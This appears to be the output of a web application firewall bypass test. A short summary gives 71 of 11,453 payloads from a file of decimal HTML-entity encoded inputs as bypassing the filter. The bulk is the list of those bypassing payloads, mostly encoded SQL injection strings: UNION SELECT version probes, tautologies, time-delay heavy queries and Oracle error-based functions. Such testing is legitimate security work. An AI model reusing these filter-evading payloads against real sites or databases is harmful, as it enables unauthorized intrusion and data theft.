================================================================================
File: decentities.txt - Summary
================================================================================
Total Tested: 11453
Bypassed: 71
Blocked: 11382
Bypass Rate: 0.62%
================================================================================

BYPASSED PAYLOADS:
--------------------------------------------------------------------------------

&#37;&#50;&#57;
&#34;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#117;&#115;&#101;&#114;&#115;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#105;&#100;&#32;&#61;&#32;&#39;&#49;&#39;&#32;&#111;&#114;&#32;&#92;&#46;&#60;&#92;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#49;&#44;&#64;&#64;&#86;&#69;&#82;&#83;&#73;&#79;&#78;&#32;&#45;&#45;&#32;&#49;&#39;&#34;
&#34;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#117;&#115;&#101;&#114;&#115;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#105;&#100;&#32;&#61;&#32;&#49;&#32;&#111;&#114;&#32;&#34;&#34;&#38;&#32;&#40;&#32;&#34;&#34;&#32;&#111;&#114;&#32;&#49;&#32;&#61;&#32;&#49;&#32;&#45;&#45;&#32;&#49;&#34;
&#64;
&#115;
&#38;
&#37;&#55;&#67;
&#101;&#120;&#101;&#99;&#32;&#115;&#112;
&#49;
&#32;&#41;&#32;&#115;
&#39;
&#34;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#117;&#115;&#101;&#114;&#115;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#105;&#100;&#32;&#61;&#32;&#49;&#32;&#42;&#92;&#46;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#110;&#117;&#108;&#108;&#44;&#64;&#64;&#86;&#69;&#82;&#83;&#73;&#79;&#78;&#32;&#45;&#45;&#32;&#49;&#34;
&#34;&#34;&#34;&#32;&#111;&#114;&#32;&#34;&#34;&#34;&#34;&#32;&#34;&#34;&#34;
&#39;&#38;&#39;
&#63;
&#118;
&#111;&#115;
&#47;
&#97;&#39;
&#97;
&#100;&#101;&#115;&#99;
&#33;
&#34;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#117;&#115;&#101;&#114;&#115;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#105;&#100;&#32;&#61;&#32;&#49;&#32;&#111;&#114;&#32;&#92;&#46;&#60;&#36;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#49;&#44;&#64;&#64;&#86;&#69;&#82;&#83;&#73;&#79;&#78;&#32;&#45;&#45;&#32;&#49;&#34;
&#99;
&#37;&#50;&#54;
&#48;
&#111;&#114;&#32;&#49;&#32;&#61;&#32;&#49;&#35;
&#124;
&#39;&#32;&#111;&#114;&#32;&#115;&#108;&#101;&#101;&#112;&#32;&#40;&#32;&#95;&#95;&#84;&#73;&#77;&#69;&#95;&#95;&#32;&#41;&#32;&#32;&#61;&#32;&#39;
&#34;&#45;&#56;&#52;&#57;&#49;&#34;&#34;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#54;&#49;&#48;&#55;&#32;&#61;&#32;&#54;&#49;&#48;&#55;&#32;&#111;&#114;&#32;&#52;&#52;&#57;&#51;&#32;&#61;&#32;&#117;&#116;&#108;&#95;&#105;&#110;&#97;&#100;&#100;&#114;&#46;&#103;&#101;&#116;&#95;&#104;&#111;&#115;&#116;&#95;&#97;&#100;&#100;&#114;&#101;&#115;&#115;&#32;&#40;&#32;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#48;&#54;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#32;&#40;&#32;&#99;&#97;&#115;&#101;&#32;&#119;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#52;&#52;&#57;&#51;&#32;&#61;&#32;&#52;&#52;&#57;&#51;&#32;&#41;&#32;&#32;&#116;&#104;&#101;&#110;&#32;&#49;&#32;&#101;&#108;&#115;&#101;&#32;&#48;&#32;&#101;&#110;&#100;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#100;&#117;&#97;&#108;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#56;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#45;&#45;&#34;
&#49;&#39;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#39;&#120;&#104;&#99;&#114;&#39;&#32;&#102;&#114;&#111;&#109;&#32;&#100;&#117;&#97;&#108;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#57;&#50;&#55;&#57;&#32;&#61;&#32;&#57;&#50;&#55;&#57;
&#45;&#49;&#57;&#49;&#48;&#39;&#32;&#111;&#114;&#32;&#50;&#54;&#50;&#52;&#32;&#61;&#32;&#51;&#51;&#55;&#49;&#32;&#97;&#110;&#100;&#32;&#39;&#117;&#109;&#111;&#121;&#39;&#32;&#61;&#32;&#39;&#117;&#109;&#111;&#121;
&#34;&#49;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#115;&#32;&#112;&#114;&#120;&#109;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#49;&#50;&#54;&#55;&#32;&#61;&#32;&#49;&#50;&#54;&#55;&#32;&#97;&#110;&#100;&#32;&#51;&#53;&#56;&#48;&#32;&#61;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#99;&#111;&#117;&#110;&#116;&#32;&#40;&#32;&#42;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#100;&#111;&#109;&#97;&#105;&#110;&#46;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#32;&#97;&#115;&#32;&#116;&#49;&#44;&#100;&#111;&#109;&#97;&#105;&#110;&#46;&#99;&#111;&#108;&#117;&#109;&#110;&#115;&#32;&#97;&#115;&#32;&#116;&#50;&#44;&#100;&#111;&#109;&#97;&#105;&#110;&#46;&#116;&#97;&#98;&#108;&#101;&#115;&#32;&#97;&#115;&#32;&#116;&#51;&#32;&#41;&#32;&#45;&#45;&#34;
&#49;&#32;&#41;&#32;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#56;&#50;&#51;&#50;&#32;&#61;&#32;&#56;&#50;&#51;&#50;&#32;&#97;&#110;&#100;&#32;&#32;&#40;&#32;&#51;&#48;&#50;&#48;&#32;&#61;&#32;&#51;&#48;&#50;&#48;&#32;&#41;&#32;&#42;&#54;&#55;&#48;&#51;&#45;&#45;
&#34;&#49;&#37;&#34;&#34;&#34;
&#34;&#45;&#53;&#54;&#50;&#53;&#34;&#34;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#54;&#48;&#56;&#55;&#44;&#54;&#48;&#56;&#55;&#44;&#54;&#48;&#56;&#55;&#44;&#54;&#48;&#56;&#55;&#44;&#54;&#48;&#56;&#55;&#44;&#54;&#48;&#56;&#55;&#45;&#45;&#34;
&#34;&#45;&#51;&#51;&#52;&#55;&#37;&#34;&#34;&#32;&#111;&#114;&#32;&#57;&#51;&#50;&#51;&#32;&#61;&#32;&#57;&#51;&#50;&#51;&#35;&#34;
&#34;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#32;&#40;&#32;&#99;&#97;&#115;&#101;&#32;&#119;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#51;&#53;&#51;&#49;&#32;&#61;&#32;&#51;&#53;&#51;&#49;&#32;&#41;&#32;&#32;&#116;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#99;&#111;&#117;&#110;&#116;&#32;&#40;&#32;&#42;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#49;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#50;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#51;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#52;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#53;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#54;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#55;&#32;&#41;&#32;&#32;&#101;&#108;&#115;&#101;&#32;&#51;&#53;&#51;&#49;&#32;&#101;&#110;&#100;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#34;
&#34;&#99;&#97;&#108;&#108;&#32;&#114;&#101;&#103;&#101;&#120;&#112;&#95;&#115;&#117;&#98;&#115;&#116;&#114;&#105;&#110;&#103;&#32;&#40;&#32;&#114;&#101;&#112;&#101;&#97;&#116;&#32;&#40;&#32;&#114;&#105;&#103;&#104;&#116;&#32;&#40;&#32;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#51;&#55;&#48;&#50;&#32;&#41;&#32;&#44;&#48;&#32;&#41;&#32;&#44;&#53;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#32;&#41;&#32;&#44;&#110;&#117;&#108;&#108;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#124;&#124;&#39;&#34;
&#45;&#51;&#53;&#55;&#56;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#41;&#32;&#32;&#111;&#114;&#100;&#101;&#114;&#32;&#98;&#121;&#32;&#49;&#45;&#45;
&#49;
&#34;&#49;&#34;&#34;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#110;&#100;&#32;&#109;&#97;&#107;&#101;&#95;&#115;&#101;&#116;&#32;&#40;&#32;&#56;&#52;&#48;&#51;&#32;&#61;&#32;&#56;&#52;&#48;&#51;&#44;&#56;&#56;&#57;&#57;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#34;&#34;&#105;&#101;&#117;&#106;&#34;&#34;&#32;&#108;&#105;&#107;&#101;&#32;&#34;&#34;&#105;&#101;&#117;&#106;&#34;
&#34;&#49;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#110;&#100;&#32;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#49;&#49;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#55;&#55;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#50;&#49;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#56;&#56;&#32;&#41;&#32;&#32;&#61;&#32;&#114;&#101;&#103;&#101;&#120;&#112;&#95;&#115;&#117;&#98;&#115;&#116;&#114;&#105;&#110;&#103;&#32;&#40;&#32;&#114;&#101;&#112;&#101;&#97;&#116;&#32;&#40;&#32;&#108;&#101;&#102;&#116;&#32;&#40;&#32;&#99;&#114;&#121;&#112;&#116;&#95;&#107;&#101;&#121;&#32;&#40;&#32;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#54;&#53;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#54;&#57;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#56;&#51;&#32;&#41;&#32;&#44;&#110;&#117;&#108;&#108;&#32;&#41;&#32;&#44;&#48;&#32;&#41;&#32;&#44;&#53;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#32;&#41;&#32;&#44;&#110;&#117;&#108;&#108;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#39;&#108;&#115;&#104;&#107;&#39;&#32;&#108;&#105;&#107;&#101;&#32;&#39;&#108;&#115;&#104;&#107;&#34;
&#49;&#39;&#32;&#41;&#32;&#32;&#97;&#115;&#32;&#102;&#120;&#105;&#100;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#53;&#57;&#50;&#54;&#32;&#61;&#32;&#53;&#57;&#50;&#54;
&#34;&#49;&#39;&#32;&#41;&#32;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#50;&#55;&#55;&#53;&#32;&#61;&#32;&#50;&#55;&#55;&#53;&#32;&#111;&#114;&#32;&#50;&#54;&#51;&#51;&#32;&#61;&#32;&#100;&#98;&#109;&#115;&#95;&#112;&#105;&#112;&#101;&#46;&#114;&#101;&#99;&#101;&#105;&#118;&#101;&#95;&#109;&#101;&#115;&#115;&#97;&#103;&#101;&#32;&#40;&#32;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#54;&#53;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#54;&#53;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#48;&#51;&#32;&#41;&#32;&#44;&#53;&#32;&#41;&#32;&#45;&#45;&#34;
&#49;&#39;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#39;&#104;&#97;&#102;&#117;&#39;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#54;&#50;&#50;&#54;&#32;&#61;&#32;&#54;&#50;&#50;&#54;
&#45;&#56;&#54;&#53;&#50;&#39;&#32;&#41;&#32;&#32;&#111;&#114;&#32;&#52;&#55;&#52;&#55;&#32;&#61;&#32;&#100;&#98;&#109;&#115;&#95;&#117;&#116;&#105;&#108;&#105;&#116;&#121;&#46;&#115;&#113;&#108;&#105;&#100;&#95;&#116;&#111;&#95;&#115;&#113;&#108;&#104;&#97;&#115;&#104;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#48;&#54;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#32;&#40;&#32;&#99;&#97;&#115;&#101;&#32;&#119;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#52;&#55;&#52;&#55;&#32;&#61;&#32;&#52;&#55;&#52;&#55;&#32;&#41;&#32;&#32;&#116;&#104;&#101;&#110;&#32;&#49;&#32;&#101;&#108;&#115;&#101;&#32;&#48;&#32;&#101;&#110;&#100;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#100;&#117;&#97;&#108;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#56;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#41;&#32;
&#34;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#103;&#101;&#110;&#101;&#114;&#97;&#116;&#101;&#95;&#115;&#101;&#114;&#105;&#101;&#115;&#32;&#40;&#32;&#55;&#52;&#57;&#52;&#44;&#55;&#52;&#57;&#52;&#44;&#99;&#97;&#115;&#101;&#32;&#119;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#55;&#52;&#57;&#52;&#32;&#61;&#32;&#55;&#56;&#53;&#52;&#32;&#41;&#32;&#32;&#116;&#104;&#101;&#110;&#32;&#49;&#32;&#101;&#108;&#115;&#101;&#32;&#48;&#32;&#101;&#110;&#100;&#32;&#41;&#32;&#32;&#108;&#105;&#109;&#105;&#116;&#32;&#49;&#45;&#45;&#34;
&#34;&#49;&#34;&#34;&#32;&#41;&#32;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#55;&#56;&#52;&#48;&#32;&#61;&#32;&#55;&#56;&#52;&#48;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#35;&#34;
&#34;&#49;&#34;&#34;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#55;&#48;&#50;&#50;&#32;&#61;&#32;&#55;&#48;&#50;&#50;&#34;
&#34;&#49;&#32;&#41;&#32;&#32;&#111;&#114;&#32;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#49;&#55;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#49;&#49;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#48;&#53;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#49;&#48;&#48;&#32;&#41;&#32;&#32;&#61;&#32;&#114;&#101;&#103;&#101;&#120;&#112;&#95;&#115;&#117;&#98;&#115;&#116;&#114;&#105;&#110;&#103;&#32;&#40;&#32;&#114;&#101;&#112;&#101;&#97;&#116;&#32;&#40;&#32;&#108;&#101;&#102;&#116;&#32;&#40;&#32;&#99;&#114;&#121;&#112;&#116;&#95;&#107;&#101;&#121;&#32;&#40;&#32;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#54;&#53;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#54;&#57;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#97;&#114;&#32;&#40;&#32;&#56;&#51;&#32;&#41;&#32;&#44;&#110;&#117;&#108;&#108;&#32;&#41;&#32;&#44;&#48;&#32;&#41;&#32;&#44;&#53;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#48;&#32;&#41;&#32;&#44;&#110;&#117;&#108;&#108;&#32;&#41;&#32;&#34;
&#49;&#32;&#41;&#32;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#51;&#57;&#51;&#54;&#32;&#61;&#32;&#51;&#57;&#51;&#54;
&#34;&#49;&#39;&#32;&#41;&#32;&#32;&#111;&#114;&#32;&#53;&#51;&#53;&#54;&#32;&#61;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#99;&#111;&#117;&#110;&#116;&#32;&#40;&#32;&#42;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#49;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#50;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#51;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#52;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#53;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#54;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#55;&#32;&#41;&#32;&#45;&#45;&#34;
&#34;&#45;&#49;&#56;&#54;&#51;&#39;&#32;&#41;&#32;&#32;&#111;&#114;&#32;&#109;&#97;&#107;&#101;&#95;&#115;&#101;&#116;&#32;&#40;&#32;&#57;&#51;&#53;&#52;&#32;&#61;&#32;&#57;&#51;&#53;&#52;&#44;&#55;&#49;&#56;&#53;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#40;&#32;&#39;&#119;&#104;&#119;&#118;&#39;&#32;&#61;&#32;&#39;&#119;&#104;&#119;&#118;&#34;
&#49;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#49;&#53;&#55;&#54;&#32;&#61;&#32;&#49;&#53;&#55;&#54;
&#49;&#32;&#41;&#32;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#57;&#49;&#54;&#55;&#32;&#61;&#32;&#57;&#49;&#54;&#55;
&#49;&#39;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#39;&#113;&#115;&#116;&#122;&#39;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#54;&#56;&#51;&#53;&#32;&#61;&#32;&#54;&#56;&#51;&#53;
&#34;&#45;&#54;&#50;&#48;&#48;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#115;&#32;&#106;&#106;&#112;&#122;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#52;&#52;&#57;&#48;&#32;&#61;&#32;&#52;&#52;&#57;&#48;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#44;&#52;&#52;&#57;&#48;&#45;&#45;&#34;
&#34;&#45;&#51;&#51;&#57;&#51;&#34;&#34;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#44;&#53;&#57;&#53;&#52;&#45;&#45;&#34;
&#34;&#49;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#110;&#100;&#32;&#54;&#52;&#49;&#52;&#32;&#61;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#99;&#111;&#117;&#110;&#116;&#32;&#40;&#32;&#42;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#114;&#100;&#98;&#36;&#102;&#105;&#101;&#108;&#100;&#115;&#32;&#97;&#115;&#32;&#116;&#49;&#44;&#114;&#100;&#98;&#36;&#116;&#121;&#112;&#101;&#115;&#32;&#97;&#115;&#32;&#116;&#50;&#44;&#114;&#100;&#98;&#36;&#99;&#111;&#108;&#108;&#97;&#116;&#105;&#111;&#110;&#115;&#32;&#97;&#115;&#32;&#116;&#51;&#44;&#114;&#100;&#98;&#36;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#115;&#32;&#97;&#115;&#32;&#116;&#52;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#39;&#121;&#107;&#120;&#122;&#39;&#32;&#61;&#32;&#39;&#121;&#107;&#120;&#122;&#34;
&#34;&#45;&#51;&#51;&#50;&#49;&#34;&#34;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#49;&#54;&#48;&#51;&#32;&#61;&#32;&#49;&#54;&#48;&#51;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#49;&#54;&#48;&#51;&#44;&#49;&#54;&#48;&#51;&#44;&#49;&#54;&#48;&#51;&#44;&#49;&#54;&#48;&#51;&#35;&#34;
&#34;&#49;&#37;&#34;&#34;&#32;&#97;&#110;&#100;&#32;&#52;&#51;&#56;&#54;&#32;&#61;&#32;&#117;&#116;&#108;&#95;&#105;&#110;&#97;&#100;&#100;&#114;&#46;&#103;&#101;&#116;&#95;&#104;&#111;&#115;&#116;&#95;&#97;&#100;&#100;&#114;&#101;&#115;&#115;&#32;&#40;&#32;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#48;&#54;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#32;&#40;&#32;&#99;&#97;&#115;&#101;&#32;&#119;&#104;&#101;&#110;&#32;&#32;&#40;&#32;&#52;&#51;&#56;&#54;&#32;&#61;&#32;&#52;&#51;&#56;&#54;&#32;&#41;&#32;&#32;&#116;&#104;&#101;&#110;&#32;&#49;&#32;&#101;&#108;&#115;&#101;&#32;&#48;&#32;&#101;&#110;&#100;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#100;&#117;&#97;&#108;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#56;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#50;&#50;&#32;&#41;&#32;&#124;&#124;&#99;&#104;&#114;&#32;&#40;&#32;&#49;&#49;&#51;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#110;&#100;&#32;&#34;&#34;&#37;&#34;&#34;&#32;&#61;&#32;&#34;&#34;&#34;
&#34;&#49;&#37;&#34;&#34;&#32;&#97;&#110;&#100;&#32;&#49;&#51;&#52;&#51;&#32;&#61;&#32;&#53;&#57;&#51;&#57;&#35;&#34;
&#34;&#49;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#97;&#115;&#32;&#117;&#110;&#99;&#121;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#56;&#48;&#48;&#57;&#32;&#61;&#32;&#56;&#48;&#48;&#57;&#32;&#117;&#110;&#105;&#111;&#110;&#32;&#97;&#108;&#108;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#44;&#110;&#117;&#108;&#108;&#35;&#34;
